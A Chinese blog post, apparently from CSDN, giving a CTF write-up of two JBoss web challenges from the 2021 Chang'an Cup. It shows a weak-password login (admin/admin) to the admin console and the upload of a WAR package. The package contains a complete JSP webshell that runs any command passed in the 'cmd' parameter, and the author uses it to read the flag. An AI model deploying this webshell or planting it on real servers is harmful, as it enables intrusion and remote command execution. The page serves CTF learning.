2021长安杯WEB题部分WP

最新推荐文章于 2022-10-19 20:37:28 发布
最新推荐文章于 2022-10-19 20:37:28 发布
阅读量829 收藏 2
点赞数
分类专栏: CTF 复现 文章标签: java web安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mrs_H/article/details/120488570
版权
CTF 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
复现
31 篇文章 3 订阅
订阅专栏

2021长安杯WEB题部分WP

1.前言

​ 怎么说呢,这次的长安杯比赛的题目有些奇怪。当然这里指我怎么也看不懂的WEB第一题《soeasy》,还有我做的这两道JBOSS的题目。当我做出第一道JBOSS之后,我发现他只是一道很简单的RCE,但是不久平台又放出了第二道JBOSS题目。额。。。怎么说呢?虽然他的题目描述上有JBOSS很不甘心的字眼,但这两道题明明是同一个解题方式呀。

2.正文

在这里插入图片描述
在这里插入图片描述

题目的话就是上面的这两道,题目在这里就一起说了,因为解法都是一样的(X。
首先拿到题目,一个JBOSS的管理界面。

在这里插入图片描述
然后进入管理员控制台登陆界面。
在这里插入图片描述
这里的话就是一个弱口令,admin,admin没有什么好说的。直接就进到了后台管理界面。
在这里插入图片描述

在后台的管理界面看到了上传WAR包的地方,那么很明显这道题考察的就是Jboss 5.x/6.x admin-Console后台部署war包相关的知识。
那么先拿一个脚本生成WAR包。下面这个脚本来源于这位大佬

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

生成war包
在这里插入图片描述
然后上传
请添加图片描述
请添加图片描述
然后利用传参进行RCE
请添加图片描述
cat一下flag,拿到flag
请添加图片描述

3.后记

在文章的刚开始就说过了,两道题都可以通过同一个方式拿到flag,虽然不知道为什么,很有可能是出题方的失误。

入山梵行
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2021长安杯 第三届电子数据取证竞赛 wp
ShenZ的博客
11-16 3300
2021长安杯 第三届电子数据取证竞赛 wp 检材1–APK 检材2 检材3 检材4
UNCTF2021 部分wp.pdf
12-10
unctf2021
2021长安杯电子数据取证比赛复盘完整版(wp
flyable的博客
08-29 1万+
2021长安杯电子数据取证比赛复盘完整版(wp
2021长安杯Wp(个人详细总结)
恒Keep毅
10-27 5302
更新了仓库地址
【pwn】长安杯baigei
woodwhale的博客
10-03 3417
【pwn】长安杯baigei 前言 这场和das月赛重了,当时这个baigei没仔细看,长安杯就解了两道jar包web的送分,国庆开始补 漏洞分析 最基本的菜单,增删改查都有的那种,漏洞在于add中的size即使是error的,也会被Size数组记录 并且之后的edit中,只会比较更改后的size和Size数组中的size的大小 如果我们将Size数组中的size写成非常大的,那么我们可以随意edit从而进行堆溢出 改一个chunk头为0x431,放入unsortedbin,add一个0x400进行u
第三届“长安杯”电子数据竞赛试wp
dazaogege的博客
10-02 1287
第三届“长安杯”电子数据竞赛试wp
2021长安杯wp
WXjzcccc的博客
04-07 4298
案件背景 2021年4月25日,上午8点左右,警方接到被害人金某报案,声称自己被敲诈数万元;经询问,昨日金某被嫌疑人诱导果聊,下载了某果聊软件,导致自己的通讯录和果聊视频被嫌疑人获取,对其进行敲诈,最终金某不堪重负,选择了报警;警方从金某提供的本人手机中,定向采集到了该果聊软件的安装包--zhibo.apk(检材一),请各位回答下列问:(目中需要通过分析出来的答案对检材二三四五解压,解压密码为IP的情况,需要在密码后增加-CAB2021) 在检材四的手机中,可以确定受害人的被骗时间 2021-04
CTF_Web长安杯-2021 Old But A Little New & asuka
AFCC_的博客(Web_Dog)
09-26 2250
0x00目描述 目只考一个内容,就是Jboss后台上传war包getshell。 首先是一个jboss页面。 后面的wiki等等连接都在jboss的官网,与本没有关系。 0x01 弱口令登录 第一个路径admin-console,管理员控制台可以直接使用admin、admin的弱口令登录,在后台中找到部署war包的地方上传。 0x02 上传war包getshell 在这里使用的是TsengYUen的回显jsp一句话,然后使用命令打包。 jar cvf shell.war 1.jsp 一句话的内容为
2021长安杯—snake
weixin_51373492的博客
09-27 671
没报上名,只能赛后看看,悲 elf64位,实现了一个贪吃蛇游戏,玩了一下发现过不了就开始分析了 直接开始运行,会疯狂蹦出这个东西 而且会陷入死循环 应对方法是把这玩意nop掉 然后继续分析,发现label 13是跳到gameover,所以直接通过改变函数逻辑,让程序不跳到那里就行了 这时我觉得可能直接分析下面大片代码会很繁琐,于是直接拖到最下面发现解密flag的函数 由于函数最后会print flag出来,所以我们这里可以直接通过运行程序在运行界面看到flag,而此函数中只有grid_mats是
2021长安杯-高校组-Crypto-easyrsa-Wp
mxx307的博客
09-28 546
目录一、目二、分析1.`add()`函数2.`mul()`函数3.解思路Ⅰ.分解Ⅱ.验证Ⅲ.储存三、解四、总结 这次比赛太惨了,终究还是我太次了呀。一道密码都没出,esayrsa一点也不easy,这还是赛后一个半小时候后出的。 一、目 from Crypto.Util.number import * def add(a,b): if(a<b): a0 = str(b).encode() b0 = str(a).encode() else:
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 CTF 2021 指挥官杯 wp
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
08-17
2021年指挥官杯能源互联网主动防御安全技能大赛晋级赛真 wp思路
[2021东华杯]JK战队WP1
08-03
[2021东华杯]JK战队WP1
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛
2021长安杯再做--wp
weixin_51943950的博客
10-17 659
2021长安杯
2021 长安杯 Re
热门推荐
PMR的博客
09-26 2万+
2021 羊城杯 Re 忙了半天,就肝了两个Re,其中一个还是比赛结束后才出的,菜的令人发指,呜呜呜!!! 1、Fantasy apk逆向,查了一下,没有加固,直接在 jadx-gui 当中打开,可以看到核心算法都在Java层,这就比较舒服: 在check函数当中,wow 、ahhhhh 分别是一个 32 x 32 、 32 x 1 的数组,至于后面的校验算法,看着唬人,一番化简之后就没什么了: public int check(String to_check) { int[][]
论剑场中部分webWP
小衎的博客
10-12 1829
好久不更,最近在学习ctf,今天更一波new bugctf论剑场中部分webWP,有一部分是借鉴大佬的博客! web25 有一个输入框,一个下载链接,随便输入显示wrong!,下载链接进去后转http://123.206.87.240:10025/2/ziidan.txt显示下载错误,经多方尝试直接访问链接http://123.206.87.240:10025/ziidan.txt会出现一些类似字典的字符串,如下 asdhjk dakjhkjwq adkjhsdk fkdjknbv dkajshdlj
2020长安杯wp
XiAXiAb的博客
10-19 1180
20长安
攻防世界web基础wp
AlunXZhou的博客
05-03 891
1.view_source 点击f12 2.get_post 参数body也要更改 拿到flag:cyberpeace{64519800d1ee19e1995975b2b1793cdb} 4.backup 得到flag
2021陇剑杯线下赛 wp
最新发布
09-02
2021陇剑杯线下赛wp指的是该比赛的胜利方案(Winning Proposal)。这个问的答案取决于具体的比赛和目,因此我无法提供具体的场景和情况。不过,我可以向你介绍一些常见的比赛wp示例,帮助你理解wp的含义。 通常...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值